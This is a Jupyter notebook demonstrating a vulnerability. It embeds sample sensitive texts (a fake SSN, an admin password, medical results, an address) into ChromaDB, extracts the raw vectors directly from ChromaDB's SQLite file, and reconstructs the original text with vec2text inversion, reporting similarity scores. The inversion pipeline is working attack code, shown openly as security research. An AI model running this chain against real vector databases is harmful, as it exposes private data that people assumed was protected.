# ChromaDB + Vec2Text Vulnerability Demonstration

This notebook shows how sensitive text stored in ChromaDB can be reconstructed from its stored embeddings using vec2text.
 
### Attack Chain:
1. Sensitive texts → OpenAI embeddings → ChromaDB storage
2. Extract embeddings from SQLite database
3. Use vec2text to reconstruct original sensitive text

In [None]:
# 1. Set up OpenAI embedding & vec2text corrector models

import vec2text
from openai import OpenAI

# ANSI color codes for live demo
class Colors:
    """ANSI escape sequences used to style terminal output during the demo."""

    # Foreground colors
    RED = "\033[91m"
    GREEN = "\033[92m"
    YELLOW = "\033[93m"

    # Text attributes
    BOLD = "\033[1m"
    UNDERLINE = "\033[4m"

    # Appended after styled text by print_colored to terminate the styling
    END = "\033[0m"

def print_colored(text, color="", bold=False):
    """Print ``text`` wrapped in ANSI styling codes.

    Args:
        text: Value to print; it is interpolated into an f-string.
        color: Name of a ``Colors`` attribute, matched case-insensitively
            via ``color.upper()``. Names that are not attributes of
            ``Colors`` add no styling.
        bold: When true, ``Colors.BOLD`` is emitted before the color code.
    """
    codes = []
    if bold:
        codes.append(Colors.BOLD)
    # Unknown names fall back to an empty string, i.e. no color code
    codes.append(getattr(Colors, color.upper(), ""))
    styling = "".join(codes)
    print(f"{styling}{text}{Colors.END}")

# OpenAI setup: the embedding model name is defined once and reused below so
# the embeddings and the inversion corrector always refer to the same model.
embedding_model = "text-embedding-ada-002"
client = OpenAI()

# Load the vec2text corrector matching the embedding model
print(f"Loading vec2text corrector for OpenAI {embedding_model}...")
corrector = vec2text.load_pretrained_corrector(embedding_model)

In [None]:
# 2. Set up ChromaDB

import chromadb

# ChromaDB setup: a persistent client writes its data under persist_directory
persist_directory = "./chromadb_vuln_demo"
chroma_client = chromadb.PersistentClient(path=persist_directory)

# Create or reset the collection so each run starts from an empty one
try:
    chroma_client.delete_collection("sensitive_docs")
except Exception:
    # Best-effort reset: on a first run there is nothing to delete.
    # NOTE(review): the exception type raised for a missing collection appears
    # to differ between ChromaDB releases, hence the broad catch - confirm and
    # narrow for the pinned version. Unlike a bare `except:`, this no longer
    # swallows KeyboardInterrupt/SystemExit.
    pass
collection = chroma_client.create_collection("sensitive_docs")

print(f"ChromaDB storage location: {persist_directory}")

In [None]:
# 3. Define sensitive documents for demo

# Demo inputs grouped by category; the groups are concatenated in order below.
_financial_identity_docs = (
    "My social security number is 818-88-8118",
    "Password for admin account is SecurePass123!",
)
_medical_docs = (
    "Patient diagnosed with Type 2 diabetes, prescribed metformin",
    "Blood test results show cholesterol level of 277 mg/dL",
)
_personal_docs = (
    "John Doe lives at 1 World Trade Center, New York, NY 10007",
)

# Flat list of the texts that get embedded and stored
sensitive_documents = [
    *_financial_identity_docs,
    *_medical_docs,
    *_personal_docs,
]

In [None]:
# 4. Generate embeddings & store in ChromaDB

# Section banner for the embedding-generation step
banner_rule = "=" * 80
print(banner_rule)
print_colored("GENERATING EMBEDDINGS FROM SENSITIVE DOCUMENTS", bold=True)
print(f"{banner_rule}\n")

def get_embeddings_openai(text_list):
    """Embed a batch of texts through the OpenAI embeddings endpoint.

    Args:
        text_list: Texts to embed; passed as the request's ``input``.

    Returns:
        A list with the ``embedding`` of each response item, ordered by the
        item's ``index`` so results line up with ``text_list``. An empty
        ``text_list`` yields ``[]`` without issuing a request.
    """
    # Nothing to embed: skip the network round-trip entirely
    if not text_list:
        return []

    response = client.embeddings.create(
        input=text_list,
        model=embedding_model,
        encoding_format="float",
    )
    # Order explicitly by the index reported for each item instead of
    # relying on the order in which the items appear in the response.
    ordered_items = sorted(response.data, key=lambda item: item.index)
    return [item.embedding for item in ordered_items]

# Embed every demo document in a single call
embeddings = get_embeddings_openai(sensitive_documents)
print(f"Generated {len(embeddings)} embeddings of dimension {len(embeddings[0])}")

# Persist texts, vectors, ids and metadata together; ids and metadata are
# derived from each document's position in sensitive_documents
doc_positions = range(len(sensitive_documents))
collection.add(
    documents=sensitive_documents,
    embeddings=embeddings,
    ids=[f"sensitive_doc_{pos}" for pos in doc_positions],
    metadatas=[{"type": "sensitive", "doc_num": pos} for pos in doc_positions],
)

In [None]:
# 5. Extract embeddings from ChromaDB SQLite backend

import sqlite3
import struct
import os

print("="*80)
print_colored("EXTRACTING EMBEDDINGS FROM CHROMADB SQLITE BACKEND", bold=True)
print("="*80 + "\n")

# Open ChromaDB's SQLite file directly, bypassing the ChromaDB client
db_path = os.path.join(persist_directory, "chroma.sqlite3")
conn = sqlite3.connect(db_path)
try:
    cursor = conn.cursor()
    print(f"Connected to SQLite database: {db_path}")

    # Select the two needed columns by name rather than SELECT * with
    # positional indexes, so a schema change fails loudly instead of silently
    # reading the wrong column. Rows without a vector are skipped because
    # they cannot be unpacked.
    # NOTE(review): presumably NULL vectors belong to non-insert log entries
    # such as deletions - confirm against the ChromaDB schema.
    cursor.execute(
        "SELECT id, vector FROM embeddings_queue "
        "WHERE vector IS NOT NULL ORDER BY seq_id"
    )
    rows = cursor.fetchall()
finally:
    # Always release the database handle, even if the query fails
    conn.close()

print(f"Found {len(rows)} embedding records in database\n")

# Decode each blob into a list of Python floats
extracted_embeddings = []
for i, (doc_id, embedding_blob) in enumerate(rows, start=1):
    # The blob is treated as packed 4-byte floats in native byte order
    num_floats = len(embedding_blob) // 4
    embedding_values = struct.unpack(f'{num_floats}f', embedding_blob)
    extracted_embeddings.append(list(embedding_values))

    print_colored(f"Extracted embedding {i} corresponding to {doc_id}; {len(embedding_values)} dimensions", "RED")

In [None]:
# 6. Convert to PyTorch & invert each embedding

import time
import torch

# Choose the accelerator first (MPS is checked before CUDA); None means the
# tensor stays where torch.tensor() created it
if torch.backends.mps.is_available():
    target_device = 'mps'
elif torch.cuda.is_available():
    target_device = 'cuda'
else:
    target_device = None

# Build the float32 tensor from the extracted lists, then move it if needed
embeddings_tensor = torch.tensor(extracted_embeddings, dtype=torch.float32)
if target_device is not None:
    embeddings_tensor = embeddings_tensor.to(target_device)

# One dict per document: original text, reconstruction, similarity, timing
results = []

print("="*80)
print_colored("RUNNING EMBEDDING INVERSION", bold=True)
print("="*80)

# zip() stops at the shorter input without complaint, so a count mismatch
# would silently drop items or pair documents with the wrong embedding.
if len(sensitive_documents) != len(embeddings_tensor):
    print_colored(
        f"Warning: {len(sensitive_documents)} original documents but "
        f"{len(embeddings_tensor)} extracted embeddings; "
        "comparisons below may be misaligned",
        "YELLOW",
        bold=True,
    )

for i, (original_doc, embedding) in enumerate(zip(sensitive_documents, embeddings_tensor)):
    print_colored(f"\nDocument #{i+1}:", bold=True)
    print(f"\nOriginal:      \"{original_doc}\"")

    # perf_counter is monotonic, so the measured duration cannot be skewed
    # by system clock adjustments
    start_time = time.perf_counter()

    # Invert a single embedding; the result is a list, one entry per input row
    reconstructed_list = vec2text.invert_embeddings(
        embeddings=embedding.unsqueeze(0),  # Add batch dimension
        corrector=corrector,
        num_steps=4,
        sequence_beam_width=1,
    )
    reconstructed = reconstructed_list[0]

    inversion_time = time.perf_counter() - start_time

    print(f"Reconstructed: \"{reconstructed}\"")

    # Similarity: re-embed the reconstruction and compare it with the
    # extracted embedding; an empty reconstruction is scored 0.0 without
    # calling the embedding API
    if reconstructed:
        orig_emb_cpu = embedding.cpu()
        new_emb = get_embeddings_openai([reconstructed])[0]
        new_emb_tensor = torch.tensor(new_emb, dtype=torch.float32)
        similarity = torch.nn.functional.cosine_similarity(orig_emb_cpu, new_emb_tensor, dim=0).item()
    else:
        similarity = 0.0

    # Exact match ignores case and surrounding whitespace
    exact_match = original_doc.lower().strip() == reconstructed.lower().strip()

    if exact_match:
        print_colored("Exact match", "RED", bold=True)

    sim_color = "RED" if similarity > 0.99 else "YELLOW" if similarity > 0.95 else "GREEN"
    print_colored(f"Similarity: {similarity:.4f}", sim_color, bold=True)
    print(f"Inversion time: {inversion_time:.2f}s")

    results.append({
        'original': original_doc,
        'reconstructed': reconstructed,
        'similarity': similarity,
        'time': inversion_time,
        'exact_match': exact_match,
    })

In [None]:
# 7. Summary Analysis

import numpy as np

print("\n" + "="*80)
print_colored("VULNERABILITY SUMMARY", bold=True)
print("="*80 + "\n")

total_docs = len(results)
exact_matches = sum(1 for r in results if r['exact_match'])
high_similarity = sum(1 for r in results if r['similarity'] > 0.95)

print(f"Total documents processed: {total_docs}")

if total_docs:
    print(f"Exact reconstructions: {exact_matches} ({exact_matches/total_docs*100:.1f}%)")
    print(f"High similarity (>95%): {high_similarity} ({high_similarity/total_docs*100:.1f}%)")

    avg_similarity = np.mean([r['similarity'] for r in results])
    avg_time = np.mean([r['time'] for r in results])
    # Same thresholds as the per-document similarity coloring
    sim_color = "RED" if avg_similarity > 0.99 else "YELLOW" if avg_similarity > 0.95 else "GREEN"

    print_colored(f"Average similarity: {avg_similarity*100:.2f}%", sim_color, bold=True)
    print(f"Average inversion time: {avg_time:.2f}s")
else:
    # With no results the percentages would divide by zero and the means
    # would be NaN, so report the situation instead
    print_colored("No inversion results to summarize.", "YELLOW", bold=True)